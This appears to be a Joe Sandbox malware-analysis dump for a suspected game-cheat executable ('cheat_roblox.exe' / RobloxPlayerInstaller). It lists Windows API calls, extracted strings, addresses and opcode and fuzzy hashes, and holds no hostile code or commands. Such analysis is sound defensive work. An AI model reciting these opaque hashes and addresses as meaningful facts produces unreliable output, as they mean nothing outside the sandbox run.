                                                                              • Instruction ID: 41ba949baf0bea4776bc1d1cfbcc89f1dd8de5c38bd56b5c6cd61c8fa6c0a907
                                                                              • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                              • Instruction Fuzzy Hash: 4B111E20E1EB4B81FE758F01A94227423ADEF18794F4D54B7C85EEA360EE3CA8559710
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E651A4: GetVersionExW.KERNEL32 ref: 00007FF693E651D5
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6ED8C
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6ED98
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDA8
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDB6
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDC4
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EE05
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                              • Instruction ID: 1d889ddea4a752323a00ddcd70b4672f4800f96ee78d094352cf69f2d3416325
                                                                              • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                              • Instruction Fuzzy Hash: D8517DB2B146558BEB24CFB8D4411AC37B5F748B98B60403AEE0DA7B58DF38E956C700
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                              • Instruction ID: eb13d7693ba9eef83cdbd4a4cd628c1469494da4685556d72f85322f730faf8e
                                                                              • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                              • Instruction Fuzzy Hash: B0311962B14A518EFB14CFB5E8911AC3774FB08758B54502AEF0EE7A68EF38D895C710
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: .rar$exe$rar$sfx
                                                                              • API String ID: 3668304517-630704357
                                                                              • Opcode ID: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                              • Instruction ID: 6694364e18c247ff75810e892af19e00eef1c037a48a002b677890c6d53a314b
                                                                              • Opcode Fuzzy Hash: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                              • Instruction Fuzzy Hash: C4A1BF22A14A0680EB209F25D8562BC3369FF44BA8F441277DE1DA77EADF3CE591C344
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 2889003569-2084237596
                                                                              • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                              • Instruction ID: b988fdec5e374de0174cc22cb74e3a265e21a72350da4f10f298d833a03c07c4
                                                                              • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                              • Instruction Fuzzy Hash: 17918073E08B918AE721CB65E8412AD7BB4FB04788F14416AEE4DA7B95DF38D195CB00
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                              • String ID: csm$f
                                                                              • API String ID: 2395640692-629598281
                                                                              • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                              • Instruction ID: ac4798454bdcf74a4665158b559fa22c732cfe52e53b75e7c5c6d875bd5a1c82
                                                                              • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                              • Instruction Fuzzy Hash: EB51B332E1960286EB24CF15E845B3937A9FB40B98F5080B6DE1EA77C8DF78E841C740
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                              • API String ID: 2102711378-639343689
                                                                              • Opcode ID: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                              • Instruction ID: 0ad4438eeb6e30a8dd8a2f815b7df8bb1336e5fd3ab6f45b4208fe671dc29761
                                                                              • Opcode Fuzzy Hash: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                              • Instruction Fuzzy Hash: FC51B162F1874245FE21DB65D8522BE23B9EF847A4F0001B2DE1DE66A6DF3CA885C300
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Show$Rect
                                                                              • String ID: RarHtmlClassName
                                                                              • API String ID: 2396740005-1658105358
                                                                              • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                              • Instruction ID: 41f113368349b2cce3e2de5798baf2a3f2b5c59a8069f6c8b96258198e927347
                                                                              • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                              • Instruction Fuzzy Hash: 7851A421A087428AEB74DB22F45637A67A5FF88780F004476EE8FA7B55DF3CE4458700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                              • String ID: sfxcmd$sfxpar
                                                                              • API String ID: 3540648995-3493335439
                                                                              • Opcode ID: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                              • Instruction ID: be14770014f3408627f008716f77fe577fcb2612d44a1f58a3ac1787cbe51d6e
                                                                              • Opcode Fuzzy Hash: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                              • Instruction Fuzzy Hash: 95315072E14A1684EB14CF65E4862AC3379FB48B98F541172DF5EA77AADF38E042C344
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                              • API String ID: 0-56093855
                                                                              • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                              • Instruction ID: d2eeb33aa48174dcca34b02bda93ebb40b31bd9c3a5f1c60385131469b36902a
                                                                              • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                              • Instruction Fuzzy Hash: 78211B2590CB8781FA318B16B84617423B8EF8AB88F1400B7D94EFB761DF3CE4868304
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                              • Instruction ID: 90b29c2e1fb634872e233a249cfcdd1260899a795deca6f17549065420894afb
                                                                              • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                              • Instruction Fuzzy Hash: 1EF06265A19A4681EF64DF11F4413796364EF88BD0F441077D94FD6665DE3CE884C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID:
                                                                              • API String ID: 3215553584-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2398171386-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3659116390-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _set_statfp
                                                                              • String ID:
                                                                              • API String ID: 1156100317-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                              • String ID:
                                                                              • API String ID: 3621893840-0
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __except_validate_context_recordabort
                                                                              • String ID: csm$csm
                                                                              • API String ID: 746414643-3733052814
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: $*
                                                                              • API String ID: 3215553584-3982473090
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$StringType
                                                                              • String ID: $%s
                                                                              • API String ID: 3586891840-3791308623
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                              • String ID: csm
                                                                              • API String ID: 2466640111-1018135373
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                              • String ID: U
                                                                              • API String ID: 2456169464-4171548499
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ObjectRelease
                                                                              • String ID:
                                                                              • API String ID: 1429681911-3916222277
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8BB
                                                                              • CreateSemaphoreW.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8CB
                                                                              • CreateEventW.KERNEL32(?,?,?,00007FF693E7317F,?,?,00001000,00007FF693E5E51D), ref: 00007FF693E6E8E4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                              • String ID: Thread pool initialization failed.
                                                                              • API String ID: 3340455307-2182114853
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CapsDeviceRelease
                                                                              • String ID:
                                                                              • API String ID: 127614599-3916222277
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                              • String ID:
                                                                              • API String ID: 1137671866-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                              • String ID:
                                                                              • API String ID: 1077098981-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 4141327611-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3823481717-0
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90B91
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90BF3
                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90C2D
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF693E8C45B), ref: 00007FF693E90C57
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                              • String ID:
                                                                              • API String ID: 1557788787-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ErrorLast$abort
                                                                              • String ID:
                                                                              • API String ID: 1447195878-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                              • Instruction ID: 72177c7642c161e17e65be6b86abd01d73ca25c9b220ce1fa2469f5785b36dd5
                                                                              • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                              • Instruction Fuzzy Hash: BAE0ED60E0970682FF6A5BB2B85B13621A4EF88741F0844BBD81FAA750DD3CE4858614
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: DXGIDebug.dll
                                                                              • API String ID: 3668304517-540382549
                                                                              • Opcode ID: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                              • Instruction ID: 476778f52e235df942f4993e73ac394805ef9e3fe3942e962b8c6fd7b65e3dc2
                                                                              • Opcode Fuzzy Hash: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                              • Instruction Fuzzy Hash: 0E71AC72A14B8586EB24CF25E8453ADB3A8FB54798F044236DFAD97B95DF78E061C300
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: e+000$gfff
                                                                              • API String ID: 3215553584-3030954782
                                                                              • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                              • Instruction ID: abc09ca7b36b8c861971888944972d42a58ae05b9b7e8d1b9b589e28a9f0d7c2
                                                                              • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                              • Instruction Fuzzy Hash: 21510562F187C586E7358F39994236D6B99EB81B90F0892B2DA9CD7BD5CF2CE444C700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                              • String ID: SIZE
                                                                              • API String ID: 449872665-3243624926
                                                                              • Opcode ID: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                              • Instruction ID: 91e1359291f12fa4a78fcb8318c8c5a999874a744af4cb23c4bef4143a027497
                                                                              • Opcode Fuzzy Hash: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                              • Instruction Fuzzy Hash: 1A41C262E1868285EE20DB24E4523BD7365FF85794F504273FB9D966D6EE3CE580C700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                              • String ID: C:\Users\user\Desktop\cheat_roblox.exe
                                                                              • API String ID: 3307058713-3708674124
                                                                              • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                              • Instruction ID: 6a3b096fdaa47580e87790448cc70e4a6fb342b24cf9e38ae51b3f3fb5091f80
                                                                              • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                              • Instruction Fuzzy Hash: 59419336E08B568AE725DF25A4421BDB7ACEF457D4B4440B3E94EA7B55DE3CE442C300
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Item$Text$Dialog
                                                                              • String ID: ASKNEXTVOL
                                                                              • API String ID: 2638039312-3402441367
                                                                              • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                              • Instruction ID: e8753d0689cba286fbefb59bea8cd3e54c557d8cd2da7b80ab4e3bf58b9e2977
                                                                              • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                              • Instruction Fuzzy Hash: D7418722F0868281FE749B16E5561B927A9EF86BC4F140077EE4EF7796CE3DE4418340
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide_snwprintf
                                                                              • String ID: $%s$@%s
                                                                              • API String ID: 2650857296-834177443
                                                                              • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                              • Instruction ID: fcda584fb2586f79436601e316ed56639fbb1459db7412fa883d6e9af6e2f0dc
                                                                              • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                              • Instruction Fuzzy Hash: FD31C0B2B18A4A85EB708F66E4426E933A9FB44788F401073EF0DA7795EE3CE505C700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FileHandleType
                                                                              • String ID: @
                                                                              • API String ID: 3000768030-2766056989
                                                                              • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                              • Instruction ID: c04c985d8b33e44460c6e9d92d1e85d234f52738b755f14e3a620a8a26d78a28
                                                                              • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                              • Instruction Fuzzy Hash: 6C21B922F09B8241EB708B2D98911792659EBC5774F280377E66FA77D4DE3DE881C301
                                                                              APIs
                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF693E81D3E), ref: 00007FF693E840BC
                                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF693E81D3E), ref: 00007FF693E84102
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ExceptionFileHeaderRaise
                                                                              • String ID: csm
                                                                              • API String ID: 2573137834-1018135373
                                                                              • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                              • Instruction ID: 5e3543b0f2bf7a3712097c2d4622fca66af6f84b4a22ce3e26fba9884e908da3
                                                                              • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                              • Instruction Fuzzy Hash: 06114F32A08B4582EB218F15E44026A77E5FB88B94F184272DF8D57764DF3CD955CB00
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA63
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA6E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorLastObjectSingleWait
                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                              • API String ID: 1211598281-2248577382
                                                                              • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                              • Instruction ID: 2d0ae11ea31ce23becfd9e19f8042790f85c51cbea3b14c4e987759caca48fe8
                                                                              • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                              • Instruction Fuzzy Hash: 02E04865E1590341F9305B22AC435782259FF90770F9043B3D03EE11F19F6CAD49C300
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FindHandleModuleResource
                                                                              • String ID: RTL

                                                                              Execution Graph

                                                                              Execution Coverage:21.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.1%
                                                                              Total number of Nodes:481
                                                                              Total number of Limit Nodes:7


                                                                              Control-flow Graph

                                                                              control_flow_graph 254 125d0f8-125d108 255 125d137-125d13b 254->255 256 125d10a-125d11b GetPEB 254->256 257 125d11d-125d121 call 125cb8d 256->257 258 125d12e-125d135 256->258 260 125d126-125d129 257->260 258->255 260->258 261 125d12b-125d12d 260->261 261->258
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e5c1a1e5406207a1bb35c5ed04f1fed4ada7396c931dbc2c8d7af1cad82e206c
                                                                              • Instruction ID: 517382e097739c575eabdfc301a5ec3fa18c8aed81d48a75212c07f1878ac3df
                                                                              • Opcode Fuzzy Hash: e5c1a1e5406207a1bb35c5ed04f1fed4ada7396c931dbc2c8d7af1cad82e206c
                                                                              • Instruction Fuzzy Hash: 0DF03032A21328EFCB26CA9CC445B9973ADEB49B61F114056E9019B141D674DD00DBC0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,5727C2D5,?,0125CB0C,?,?,?,00000000), ref: 0125CAC0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-$ext-ms-
                                                                              • API String ID: 3664257935-537541572
                                                                              • Opcode ID: 22b7838c21f4a342ac69e0b11452a9291777c1d23889ab4218dd8c9a6174c9c3
                                                                              • Instruction ID: 98f8477e13c1a205489c936d28edc7ef72c671bd23a7612f770f53e923bf4771
                                                                              • Opcode Fuzzy Hash: 22b7838c21f4a342ac69e0b11452a9291777c1d23889ab4218dd8c9a6174c9c3
                                                                              • Instruction Fuzzy Hash: 4E21EB71A11322ABD772DF24EC85A6A3F6CAB41770F140514FE16A7285E774E911C7D0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 21 12444f4-1244501 call 125a316 24 1244541-1244544 ExitThread 21->24 25 1244503-124450b 21->25 25->24 26 124450d-1244511 25->26 27 1244513 call 125d03e 26->27 28 1244518-124451e 26->28 27->28 30 1244520-1244522 28->30 31 124452b-1244531 28->31 30->31 32 1244524-1244525 CloseHandle 30->32 31->24 33 1244533-1244535 31->33 32->31 33->24 34 1244537-124453b FreeLibraryAndExitThread 33->34 34->24
                                                                              APIs
                                                                                • Part of subcall function 0125A316: GetLastError.KERNEL32(00000000,?,0123E677,0125B9ED,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125A31A
                                                                                • Part of subcall function 0125A316: SetLastError.KERNEL32(00000000), ref: 0125A3BC
                                                                              • CloseHandle.KERNEL32(?,?,?,0124462B,?,?,0124449D,00000000), ref: 01244525
                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,0124462B,?,?,0124449D,00000000), ref: 0124453B
                                                                              • ExitThread.KERNEL32 ref: 01244544
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                              • String ID:
                                                                              • API String ID: 1991824761-0
                                                                              • Opcode ID: 4e0652a2a21ee0870b17ad2a339aa83e6b939aa4e423849727a007ad08bd76b3
                                                                              • Instruction ID: e865b80c80c7c5a7b5285866e4542a6c9cc757bf5dac923fc59339391251b97c
                                                                              • Opcode Fuzzy Hash: 4e0652a2a21ee0870b17ad2a339aa83e6b939aa4e423849727a007ad08bd76b3
                                                                              • Instruction Fuzzy Hash: 9EF05E304216526BEF397B69E84CB6A3E99AF10361B884710AF25DB990DB30D94187D0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000002,?,01254375,0124466F,0124466F,?,00000002,5727C2D5,0124466F,00000002), ref: 0125438C
                                                                              • TerminateProcess.KERNEL32(00000000,?,01254375,0124466F,0124466F,?,00000002,5727C2D5,0124466F,00000002), ref: 01254393
                                                                              • ExitProcess.KERNEL32 ref: 012543A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 0e4df94015e41422cea89e150a23215f223a5470c6eb67fad726473943d8d7cc
                                                                              • Instruction ID: f12881664a65eaac3a6fbee485a52f6cab593ceac3815e3ecf39c6cf806c8ffc
                                                                              • Opcode Fuzzy Hash: 0e4df94015e41422cea89e150a23215f223a5470c6eb67fad726473943d8d7cc
                                                                              • Instruction Fuzzy Hash: 63D09E31051585BBCFA13FA1EC4D95D7F25EF403517A44010BE094A13AEF7199D19B80

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetLastError.KERNEL32(0136C1C8,0000000C), ref: 01244452
                                                                              • ExitThread.KERNEL32 ref: 01244459
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorExitLastThread
                                                                              • String ID:
                                                                              • API String ID: 1611280651-0
                                                                              • Opcode ID: 7ce2e3768778029bfac05c6af96590fe2ce7687789bd0d88e1adf6eb8a207997
                                                                              • Instruction ID: d1165dde9248cbbce16915f2cf3702a306295ed7c5faccdd67c3881468264836
                                                                              • Opcode Fuzzy Hash: 7ce2e3768778029bfac05c6af96590fe2ce7687789bd0d88e1adf6eb8a207997
